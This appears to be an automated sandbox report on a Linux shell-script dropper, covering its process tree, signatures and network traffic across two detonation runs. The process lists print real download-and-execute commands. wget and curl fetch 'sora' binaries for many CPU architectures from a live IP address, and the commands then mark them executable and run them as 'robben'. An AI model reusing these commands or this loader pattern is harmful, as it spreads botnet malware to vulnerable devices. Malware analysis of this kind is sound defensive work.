| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh | N/A |
Processes
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-a23af2012a9c4325be1adc61f96c31ce-systemd-timedated.service-FpU7jx]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 02:04
Reported
2024-10-18 02:06
Platform
debian9-mipsel-20240729-en
Max time kernel
28s
Max time network
29s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh | N/A |
Processes
/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh
[/tmp/7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x 7e6b05cccd6c301a8b1998f94354ff18ae89c8a777c0b1c59e9bc821b12f287d.sh robben systemd-private-84cfa85d45284502a0219e031a128268-systemd-timedated.service-EBCqfd]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp | |
| NL | 93.123.85.141:80 | tcp |